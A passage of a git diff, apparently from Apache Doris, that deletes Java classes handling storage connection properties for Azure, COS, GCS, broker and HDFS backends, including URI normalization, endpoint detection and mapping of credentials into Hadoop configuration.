if (enable) { - return true; - } - String value = Stream.of("azure.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT") - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - if (!Strings.isNullOrEmpty(value)) { - return AzurePropertyUtils.isAzureBlobEndpoint(value); - } - return false; - } - - @Override - public Map getBackendConfigProperties() { - if (!azureAuthType.equalsIgnoreCase("OAuth2")) { - Map s3Props = new HashMap<>(); - s3Props.put("AWS_ENDPOINT", endpoint); - s3Props.put("AWS_REGION", "dummy_region"); - s3Props.put("AWS_ACCESS_KEY", accountName); - s3Props.put("AWS_SECRET_KEY", accountKey); - s3Props.put("AWS_NEED_OVERRIDE_ENDPOINT", "true"); - s3Props.put("provider", "azure"); - s3Props.put("use_path_style", usePathStyle); - return s3Props; - } - // oauth2 use hadoop config - Map s3Props = new HashMap<>(); - hadoopConfigMap.forEach(s3Props::put); - return s3Props; - } - - /** - * Azure blob/dfs host suffixes used to derive per-endpoint {@code fs.azure.account.key.*} keys, inlined from the - * legacy fe-core {@code Config.azure_blob_host_suffixes} default. fe-property has no fe-core {@code Config}; the - * engine may overwrite this at startup to mirror a user-customized value. - */ - public static volatile String[] azureBlobHostSuffixes = { - ".blob.core.windows.net", - ".dfs.core.windows.net", - ".blob.core.chinacloudapi.cn", - ".dfs.core.chinacloudapi.cn", - ".blob.core.usgovcloudapi.net", - ".dfs.core.usgovcloudapi.net", - ".blob.core.cloudapi.de", - ".dfs.core.cloudapi.de" - }; - - public static final String AZURE_ENDPOINT_TEMPLATE = "https://%s.blob.core.windows.net"; - - public static String formatAzureEndpoint(String endpoint, String accountName) { - if (Strings.isNullOrEmpty(endpoint)) { - if (Strings.isNullOrEmpty(accountName)) { - return ""; - } - return String.format(AZURE_ENDPOINT_TEMPLATE, accountName); - } - if (endpoint.contains("://")) { - return endpoint; - } - return "https://" + endpoint; - } - - @Override - public String validateAndNormalizeUri(String url) throws StoragePropertiesException { - return AzurePropertyUtils.validateAndNormalizeUri(url); - - } - - @Override - public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { - return AzurePropertyUtils.validateAndGetUri(loadProps); - } - - @Override - public String getStorageName() { - return "AZURE"; - } - - @Override - public void initializeHadoopStorageConfig() { - hadoopConfigMap = new LinkedHashMap<>(); - //disable azure cache - // Disable all Azure ABFS/WASB FileSystem caching to ensure fresh instances per configuration - for (String scheme : new String[]{"abfs", "abfss", "wasb", "wasbs"}) { - hadoopConfigMap.put("fs." + scheme + ".impl.disable.cache", "true"); - } - origProps.forEach((k, v) -> { - if (k.startsWith("fs.azure.")) { - hadoopConfigMap.put(k, v); - } - }); - if (azureAuthType != null && azureAuthType.equalsIgnoreCase("OAuth2")) { - setHDFSAzureOauth2Config(hadoopConfigMap); - } else { - setHDFSAzureAccountKeys(hadoopConfigMap, accountName, accountKey); - } - } - - @Override - protected Set schemas() { - return ImmutableSet.of("wasb", "wasbs", "abfs", "abfss"); - } - - private static void setHDFSAzureAccountKeys(Map conf, String accountName, String accountKey) { - Set endpoints = new LinkedHashSet<>(); - if (azureBlobHostSuffixes != null) { - for (String endpointSuffix : azureBlobHostSuffixes) { - if (Strings.isNullOrEmpty(endpointSuffix)) { - continue; - } - String normalizedEndpoint = endpointSuffix.trim().toLowerCase(Locale.ROOT); - if (normalizedEndpoint.startsWith(".")) { - normalizedEndpoint = normalizedEndpoint.substring(1); - } - if (!normalizedEndpoint.isEmpty()) { - endpoints.add(normalizedEndpoint); - } - } - } - for (String endpoint : endpoints) { - String accountKeyConfig = String.format("fs.azure.account.key.%s.%s", accountName, endpoint); - conf.put(accountKeyConfig, accountKey); - } - conf.put("fs.azure.account.key", accountKey); - } - - private void setHDFSAzureOauth2Config(Map conf) { - conf.put(String.format("fs.azure.account.auth.type.%s", accountHost), "OAuth"); - conf.put(String.format("fs.azure.account.oauth.provider.type.%s", accountHost), - "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider"); - conf.put(String.format("fs.azure.account.oauth2.client.id.%s", accountHost), clientId); - conf.put(String.format("fs.azure.account.oauth2.client.secret.%s", accountHost), clientSecret); - conf.put(String.format("fs.azure.account.oauth2.client.endpoint.%s", accountHost), oauthServerUri); - } - - private ParamRules buildRules() { - return new ParamRules() - // OAuth2 requires either credential or token, but not both - .requireIf(azureAuthType, AzureAuthType.OAuth2.name(), new String[]{accountHost, - clientId, - clientSecret, - oauthServerUri}, "When auth_type is OAuth2, oauth2_account_host, oauth2_client_id" - + ", oauth2_client_secret, and oauth2_server_uri are required.") - .requireIf(azureAuthType, AzureAuthType.SharedKey.name(), new String[]{accountName, accountKey}, - "When auth_type is SharedKey, account_name and account_key are required."); - } - - // NB:Temporary check: - // Temporary check: Currently using OAuth2 for accessing Onalake storage via HDFS. - // In the future, OAuth2 will be supported via native SDK to reduce maintenance. - // For now, OAuth2 authentication is only allowed for Iceberg REST. - // TODO: Remove this temporary check later - private static final String ICEBERG_CATALOG_TYPE_KEY = "iceberg.catalog.type"; - private static final String ICEBERG_CATALOG_TYPE_REST = "rest"; - private static final String TYPE_KEY = "type"; - private static final String ICEBERG_VALUE = "iceberg"; - - private boolean isIcebergRestCatalog() { - // check iceberg type - boolean hasIcebergType = origProps.entrySet().stream() - .anyMatch(entry -> TYPE_KEY.equalsIgnoreCase(entry.getKey()) - && ICEBERG_VALUE.equalsIgnoreCase(entry.getValue())); - if (!hasIcebergType && origProps.keySet().stream().anyMatch(TYPE_KEY::equalsIgnoreCase)) { - return false; - } - return origProps.entrySet().stream() - .anyMatch(entry -> ICEBERG_CATALOG_TYPE_KEY.equalsIgnoreCase(entry.getKey()) - && ICEBERG_CATALOG_TYPE_REST.equalsIgnoreCase(entry.getValue())); - } - -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java deleted file mode 100644 index cfd1b3bff3d574..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/AzurePropertyUtils.java +++ /dev/null @@ -1,244 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.StoragePropertiesException; - -import org.apache.commons.lang3.StringUtils; - -import java.net.URI; -import java.net.URISyntaxException; -import java.util.Locale; -import java.util.Map; -import java.util.regex.Pattern; - -public class AzurePropertyUtils { - /** - * Validates and normalizes an Azure Blob Storage URI into a unified {@code s3://}-style format. - *

      - * This method supports the following URI formats: - *

        - *
      • HDFS-style Azure URIs: {@code wasb://}, {@code wasbs://}, {@code abfs://}, {@code abfss://}
      • - *
      • HTTPS-style Azure Blob URLs: {@code https://.blob.core.windows.net//}
      • - *
      - *

      - * The normalized output will always be in the form of: - *

      {@code
      -     * s3:///
      -     * }
      - *

      - * Examples: - *

        - *
      • {@code wasbs://container@account.blob.core.windows.net/data/file.txt} - * → {@code s3://container/data/file.txt}
      • - *
      • {@code https://account.blob.core.windows.net/container/file.csv} - * → {@code s3://container/file.csv}
      • - *
      - * - * @param path the input Azure URI string to be validated and normalized - * @return a normalized {@code s3://}-style URI - * @throws StoragePropertiesException if the URI is blank, invalid, or unsupported - */ - public static String validateAndNormalizeUri(String path) throws StoragePropertiesException { - - if (StringUtils.isBlank(path)) { - throw new StoragePropertiesException("Path cannot be null or empty"); - } - // Only accept Azure Blob Storage-related URI schemes - if (!(path.startsWith("wasb://") || path.startsWith("wasbs://") - || path.startsWith("abfs://") || path.startsWith("abfss://") - || path.startsWith("https://") || path.startsWith("http://") - || path.startsWith("s3://"))) { - throw new StoragePropertiesException("Unsupported Azure URI scheme: " + path); - } - if (isOneLakeLocation(path)) { - return path; - } - return convertToS3Style(path); - } - - private static final Pattern ONELAKE_PATTERN = Pattern.compile( - "abfs[s]?://([^@]+)@([^/]+)\\.dfs\\.fabric\\.microsoft\\.com(/.*)?", Pattern.CASE_INSENSITIVE); - - public static boolean isAzureBlobEndpoint(String endpointOrHost) { - String host = extractHost(endpointOrHost); - if (StringUtils.isBlank(host)) { - return false; - } - String normalizedHost = host.toLowerCase(Locale.ROOT); - return matchesAnySuffix(normalizedHost, AzureProperties.azureBlobHostSuffixes); - } - - private static boolean matchesAnySuffix(String normalizedHost, String[] suffixes) { - if (suffixes == null || suffixes.length == 0) { - return false; - } - for (String suffix : suffixes) { - if (matchesSuffix(normalizedHost, suffix)) { - return true; - } - } - return false; - } - - private static boolean matchesSuffix(String normalizedHost, String suffix) { - if (StringUtils.isBlank(suffix)) { - return false; - } - String normalizedSuffix = suffix.trim().toLowerCase(Locale.ROOT); - if (!normalizedSuffix.startsWith(".")) { - normalizedSuffix = "." + normalizedSuffix; - } - return normalizedHost.endsWith(normalizedSuffix); - } - - private static String extractHost(String endpointOrHost) { - if (StringUtils.isBlank(endpointOrHost)) { - return null; - } - String normalized = endpointOrHost.trim(); - if (normalized.contains("://")) { - try { - return new URI(normalized).getHost(); - } catch (URISyntaxException e) { - return null; - } - } - int slashIndex = normalized.indexOf('/'); - if (slashIndex >= 0) { - normalized = normalized.substring(0, slashIndex); - } - int colonIndex = normalized.indexOf(':'); - if (colonIndex >= 0) { - normalized = normalized.substring(0, colonIndex); - } - return normalized; - } - - - /** - * Converts an Azure Blob Storage URI into a unified {@code s3:///} format. - *

      - * This method recognizes both: - *

        - *
      • HDFS-style Azure URIs ({@code wasb://}, {@code wasbs://}, {@code abfs://}, {@code abfss://})
      • - *
      • HTTPS-style Azure Blob URLs ({@code https://.blob.core.windows.net/...})
      • - *
      - *

      - * It throws an exception if the URI is invalid or does not match Azure Blob Storage patterns. - * - * @param uri the original Azure URI string - * @return the normalized {@code s3:///} string - * @throws StoragePropertiesException if the URI is invalid or unsupported - */ - private static String convertToS3Style(String uri) { - if (StringUtils.isBlank(uri)) { - throw new StoragePropertiesException("URI is blank"); - } - if (uri.startsWith("s3://")) { - return uri; - } - // Handle Azure HDFS-style URIs (wasb://, wasbs://, abfs://, abfss://) - if (uri.startsWith("wasb://") || uri.startsWith("wasbs://") - || uri.startsWith("abfs://") || uri.startsWith("abfss://")) { - - // Example: wasbs://container@account.blob.core.windows.net/path/file.txt - String schemeRemoved = uri.replaceFirst("^[a-z]+s?://", ""); - int atIndex = schemeRemoved.indexOf('@'); - if (atIndex < 0) { - throw new StoragePropertiesException("Invalid Azure URI, missing '@': " + uri); - } - - // Extract container name (before '@') - String container = schemeRemoved.substring(0, atIndex); - - // Extract remaining part after '@' - String remainder = schemeRemoved.substring(atIndex + 1); - int slashIndex = remainder.indexOf('/'); - - // Extract the path part if it exists - String path = (slashIndex != -1) ? remainder.substring(slashIndex + 1) : ""; - - // Normalize to s3-style URI: s3:/// - return StringUtils.isBlank(path) - ? String.format("s3://%s", container) - : String.format("s3://%s/%s", container, path); - } - - // ② Handle HTTPS/HTTP Azure Blob Storage URLs - if (uri.startsWith("https://") || uri.startsWith("http://")) { - try { - URI parsed = new URI(uri); - String host = parsed.getHost(); - String path = parsed.getPath(); - - if (StringUtils.isBlank(host)) { - throw new StoragePropertiesException("Invalid Azure HTTPS URI, missing host: " + uri); - } - - // Path usually looks like: // - String[] parts = path.split("/", 3); - if (parts.length < 2) { - throw new StoragePropertiesException("Invalid Azure Blob URL, missing container: " + uri); - } - - String container = parts[1]; - String remainder = (parts.length == 3) ? parts[2] : ""; - - // Convert HTTPS URL to s3-style format - return StringUtils.isBlank(remainder) - ? String.format("s3://%s", container) - : String.format("s3://%s/%s", container, remainder); - - } catch (URISyntaxException e) { - throw new StoragePropertiesException("Invalid HTTPS URI: " + uri, e); - } - } - - throw new StoragePropertiesException("Unsupported Azure URI scheme: " + uri); - } - - /** - * Extracts and validates the "uri" entry from a properties map. - * - *

      Example: - *

      -     * Input : {"uri": "wasb://container@account.blob.core.windows.net/dir/file.txt"}
      -     * Output: "wasb://container@account.blob.core.windows.net/dir/file.txt"
      -     * 
      - * - * @param props the configuration map expected to contain a "uri" key - * @return the URI string from the map - * @throws StoragePropertiesException if the map is empty or missing the "uri" key - */ - public static String validateAndGetUri(Map props) { - if (props == null || props.isEmpty()) { - throw new StoragePropertiesException("Properties map cannot be null or empty"); - } - - return props.entrySet().stream() - .filter(e -> StorageProperties.URI_KEY.equalsIgnoreCase(e.getKey())) - .map(Map.Entry::getValue) - .findFirst() - .orElseThrow(() -> new StoragePropertiesException("Properties must contain 'uri' key")); - } - - public static boolean isOneLakeLocation(String location) { - return ONELAKE_PATTERN.matcher(location).matches(); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java deleted file mode 100644 index f6ebdc20ea6fe0..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/BrokerProperties.java +++ /dev/null @@ -1,114 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.collect.ImmutableSet; -import com.google.common.collect.Maps; -import lombok.Getter; -import lombok.Setter; - -import java.util.HashMap; -import java.util.Map; -import java.util.Set; - -public class BrokerProperties extends StorageProperties { - - public static final String BROKER_PREFIX = "broker."; - - @Setter - @Getter - @ConnectorProperty(names = {"broker.name"}, - required = false, - description = "The name of the broker. " - + "This is used to identify the broker in the system.") - private String brokerName = ""; - - @Getter - private Map brokerParams; - - public BrokerProperties(Map origProps) { - super(Type.BROKER, origProps); - } - - public static BrokerProperties of(String brokerName, Map origProps) { - BrokerProperties properties = new BrokerProperties(origProps); - properties.setBrokerName(brokerName); - properties.initNormalizeAndCheckProps(); - return properties; - } - - private static final String BIND_BROKER_NAME_KEY = "broker.name"; - - public static boolean guessIsMe(Map props) { - if (props == null || props.isEmpty()) { - return false; - } - return props.keySet().stream() - .anyMatch(key -> key.equalsIgnoreCase(BIND_BROKER_NAME_KEY)); - } - - @Override - public void initNormalizeAndCheckProps() { - super.initNormalizeAndCheckProps(); - this.brokerParams = Maps.newHashMap(extractBrokerProperties()); - } - - @Override - public Map getBackendConfigProperties() { - return origProps; - } - - @Override - public String validateAndNormalizeUri(String url) throws StoragePropertiesException { - return url; - } - - @Override - public String validateAndGetUri(Map loadProps) throws StoragePropertiesException { - return loadProps.get("uri"); - } - - @Override - public String getStorageName() { - return "BROKER"; - } - - @Override - public void initializeHadoopStorageConfig() { - // do nothing - } - - @Override - protected Set schemas() { - //not used - return ImmutableSet.of(); - } - - private Map extractBrokerProperties() { - Map brokerProperties = new HashMap<>(); - for (String key : origProps.keySet()) { - if (key.startsWith(BROKER_PREFIX)) { - brokerProperties.put(key.substring(BROKER_PREFIX.length()), origProps.get(key)); - } - } - return brokerProperties; - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java deleted file mode 100644 index b914f28c949151..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/COSProperties.java +++ /dev/null @@ -1,172 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorPropertiesUtils; -import org.apache.doris.foundation.property.ConnectorProperty; - -import com.google.common.base.Strings; -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; - -import java.util.Map; -import java.util.Objects; -import java.util.Optional; -import java.util.Set; -import java.util.regex.Pattern; -import java.util.stream.Stream; - -public class COSProperties extends AbstractS3CompatibleProperties { - - @Setter - @Getter - @ConnectorProperty(names = {"cos.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, - required = false, - description = "The endpoint of COS.") - protected String endpoint = ""; - - @Getter - @Setter - @ConnectorProperty(names = {"cos.region", "s3.region", "AWS_REGION", "region", "REGION"}, - required = false, - isRegionField = true, - description = "The region of COS.") - protected String region = ""; - - @Getter - @ConnectorProperty(names = {"cos.access_key", "s3.access_key", "s3.access-key-id", "AWS_ACCESS_KEY", "access_key", - "ACCESS_KEY"}, - required = false, - sensitive = true, - description = "The access key of COS.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"cos.secret_key", "s3.secret_key", "s3.secret-access-key", "AWS_SECRET_KEY", - "secret_key", "SECRET_KEY"}, - required = false, - sensitive = true, - description = "The secret key of COS.") - protected String secretKey = ""; - - @Getter - @ConnectorProperty(names = {"cos.session_token", "s3.session_token", "s3.session-token", "session_token"}, - required = false, - description = "The session token of COS.") - protected String sessionToken = ""; - - /** - * The maximum number of concurrent connections that can be made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"cos.connection.maximum", "s3.connection.maximum"}, required = false, - description = "Maximum number of connections.") - protected String maxConnections = "100"; - - /** - * The timeout (in milliseconds) for requests made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"cos.connection.request.timeout", "s3.connection.request.timeout"}, required = false, - description = "Request timeout in seconds.") - protected String requestTimeoutS = "10000"; - - /** - * The timeout (in milliseconds) for establishing a connection to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"cos.connection.timeout", "s3.connection.timeout"}, required = false, - description = "Connection timeout in seconds.") - protected String connectionTimeoutS = "10000"; - - /** - * Flag indicating whether to use path-style URLs for the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"cos.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - - @ConnectorProperty(names = {"cos.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, - description = "Whether to use path style URL for the storage.") - @Getter - protected String forceParsingByStandardUrl = "false"; - - /** - * Pattern to extract the region from a Tencent Cloud COS endpoint. - *

      - * Supported formats: - * - cos.ap-guangzhou.myqcloud.com => region = ap-guangzhou*

      - * Group(1) captures the region name. - */ - private static final Set ENDPOINT_PATTERN = ImmutableSet.of( - Pattern.compile("^(?:https?://)?cos\\.([a-z0-9-]+)\\.myqcloud\\.com$")); - - protected COSProperties(Map origProps) { - super(Type.COS, origProps); - } - - public static COSProperties of(Map properties) { - COSProperties propertiesObj = new COSProperties(properties); - ConnectorPropertiesUtils.bindConnectorProperties(propertiesObj, properties); - propertiesObj.initNormalizeAndCheckProps(); - propertiesObj.initializeHadoopStorageConfig(); - return propertiesObj; - } - - protected static boolean guessIsMe(Map origProps) { - String value = Stream.of("cos.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT") - .map(origProps::get) - .filter(Objects::nonNull) - .findFirst() - .orElse(null); - if (!Strings.isNullOrEmpty(value)) { - return value.contains("myqcloud.com"); - } - Optional uriValue = origProps.entrySet().stream() - .filter(e -> e.getKey().equalsIgnoreCase("uri")) - .map(Map.Entry::getValue) - .findFirst(); - return uriValue.isPresent() && uriValue.get().contains("myqcloud.com"); - } - - @Override - protected Set endpointPatterns() { - return ENDPOINT_PATTERN; - } - - @Override - public void initializeHadoopStorageConfig() { - super.initializeHadoopStorageConfig(); - hadoopConfigMap.put("fs.cos.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); - hadoopConfigMap.put("fs.cosn.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); - hadoopConfigMap.put("fs.cosn.bucket.region", region); - hadoopConfigMap.put("fs.cosn.userinfo.secretId", accessKey); - hadoopConfigMap.put("fs.cosn.userinfo.secretKey", secretKey); - } - - @Override - protected Set schemas() { - return ImmutableSet.of("cos", "cosn"); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java deleted file mode 100644 index a7b2d6ada9a9e5..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/GCSProperties.java +++ /dev/null @@ -1,189 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; - -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import lombok.Setter; -import org.apache.commons.lang3.StringUtils; - -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.regex.Pattern; - -/** - * Google Cloud Storage (GCS) properties based on the S3-compatible protocol. - * - *

      - * Key differences and considerations: - *

        - *
      • The default endpoint is {@code https://storage.googleapis.com}, which usually does not need - * to be configured unless a custom domain is required.
      • - *
      • The region is typically not relevant for GCS since it is mapped internally by bucket, - * but may still be required when using the S3-compatible API.
      • - *
      • Access Key and Secret Key are not native GCS concepts. They exist here only for compatibility - * with the S3 protocol. Google recommends using OAuth2.0, Service Accounts, or other native - * authentication methods instead.
      • - *
      • Compatibility with older versions: - *
          - *
        • Previously, the endpoint was required. For example, - * {@code gs.endpoint=https://storage.googleapis.com} is valid and backward-compatible.
        • - *
        • If a custom endpoint is used (e.g., {@code https://my-custom-endpoint.com}), - * the user must explicitly declare that this is GCS storage and configure the mapping.
        • - *
        - *
      • - *
      • Additional authentication methods (e.g., OAuth2, Service Account) may be supported in the future.
      • - *
      - *

      - */ -public class GCSProperties extends AbstractS3CompatibleProperties { - - private static final Set GS_ENDPOINT_ALIAS = ImmutableSet.of( - "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"); - - private static final String GCS_ENDPOINT_KEY_NAME = "gs.endpoint"; - - - @Setter - @Getter - @ConnectorProperty(names = {"gs.endpoint", "s3.endpoint", "AWS_ENDPOINT", "endpoint", "ENDPOINT"}, - required = false, - description = "The endpoint of GCS.") - protected String endpoint = "https://storage.googleapis.com"; - - @Getter - protected String region = "us-east1"; - - @Getter - @ConnectorProperty(names = {"gs.access_key", "s3.access_key", "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY"}, - required = false, - sensitive = true, - description = "The access key of GCS.") - protected String accessKey = ""; - - @Getter - @ConnectorProperty(names = {"gs.secret_key", "s3.secret_key", "AWS_SECRET_KEY", "secret_key", "SECRET_KEY"}, - required = false, - sensitive = true, - description = "The secret key of GCS.") - protected String secretKey = ""; - - @Getter - @ConnectorProperty(names = {"gs.session_token", "s3.session_token", "session_token"}, - required = false, - description = "The session token of GCS.") - protected String sessionToken = ""; - - /** - * The maximum number of concurrent connections that can be made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"gs.connection.maximum", "s3.connection.maximum"}, required = false, - description = "Maximum number of connections.") - protected String maxConnections = "100"; - - /** - * The timeout (in milliseconds) for requests made to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"gs.connection.request.timeout", "s3.connection.request.timeout"}, required = false, - description = "Request timeout in seconds.") - protected String requestTimeoutS = "10000"; - - /** - * The timeout (in milliseconds) for establishing a connection to the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"gs.connection.timeout", "s3.connection.timeout"}, required = false, - description = "Connection timeout in seconds.") - protected String connectionTimeoutS = "10000"; - - /** - * Flag indicating whether to use path-style URLs for the object storage system. - * This value is optional and can be configured by the user. - */ - @Getter - @ConnectorProperty(names = {"gs.use_path_style", "use_path_style", "s3.path-style-access"}, required = false, - description = "Whether to use path style URL for the storage.") - protected String usePathStyle = "false"; - - @ConnectorProperty(names = {"gs.force_parsing_by_standard_uri", "force_parsing_by_standard_uri"}, required = false, - description = "Whether to use path style URL for the storage.") - @Getter - protected String forceParsingByStandardUrl = "false"; - - /** - * Constructor to initialize the object storage properties with the provided type and original properties map. - * - * @param origProps the original properties map. - */ - protected GCSProperties(Map origProps) { - super(Type.GCS, origProps); - } - - public static boolean guessIsMe(Map props) { - // check has gcs specific keys,ignore case - if (props.containsKey(GCS_ENDPOINT_KEY_NAME) && StringUtils.isNotBlank(props.get(GCS_ENDPOINT_KEY_NAME))) { - return true; - } - String endpoint; - for (String key : props.keySet()) { - if (GS_ENDPOINT_ALIAS.contains(key.toLowerCase())) { - endpoint = props.get(key); - if (StringUtils.isNotBlank(endpoint) && endpoint.toLowerCase().endsWith("storage.googleapis.com")) { - return true; - } - } - } - return false; - } - - @Override - protected Set endpointPatterns() { - return new HashSet<>(); - } - - - @Override - public void setRegion(String region) { - this.region = region; - } - - @Override - public void initializeHadoopStorageConfig() { - super.initializeHadoopStorageConfig(); - hadoopConfigMap.put("fs.gs.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem"); - } - - public Map getBackendConfigProperties() { - Map backendProperties = generateBackendS3Configuration(); - backendProperties.put("provider", "GCP"); - return backendProperties; - } - - @Override - protected Set schemas() { - return ImmutableSet.of("gs"); - } -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java deleted file mode 100644 index dea7b8f52744c5..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsCompatibleProperties.java +++ /dev/null @@ -1,51 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import com.google.common.collect.ImmutableSet; - -import java.util.Map; -import java.util.Set; - -public abstract class HdfsCompatibleProperties extends StorageProperties { - - - public static final String HDFS_DEFAULT_FS_NAME = "fs.defaultFS"; - - protected Map backendConfigProperties; - - protected HdfsCompatibleProperties(Type type, Map origProps) { - super(type, origProps); - } - - @Override - protected String getResourceConfigPropName() { - return "hadoop.config.resources"; - } - - @Override - public void initializeHadoopStorageConfig() { - //nothing to do - } - - @Override - protected Set schemas() { - return ImmutableSet.of("hdfs"); - } - -} diff --git a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java b/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java deleted file mode 100644 index 75e3496adc594a..00000000000000 --- a/fe/fe-property/src/main/java/org/apache/doris/property/storage/HdfsProperties.java +++ /dev/null @@ -1,219 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.property.storage; - -import org.apache.doris.foundation.property.ConnectorProperty; -import org.apache.doris.foundation.property.StoragePropertiesException; - -import com.google.common.base.Strings; -import com.google.common.collect.ImmutableSet; -import lombok.Getter; -import org.apache.commons.collections4.MapUtils; -import org.apache.commons.lang3.StringUtils; - -import java.util.Arrays; -import java.util.HashMap; -import java.util.LinkedHashMap; -import java.util.List; -import java.util.Map; -import java.util.Set; - -public class HdfsProperties extends HdfsCompatibleProperties { - - @ConnectorProperty(names = {"hdfs.authentication.type", "hadoop.security.authentication"}, - required = false, - description = "The authentication type of HDFS. The default value is 'none'.") - private String hdfsAuthenticationType = 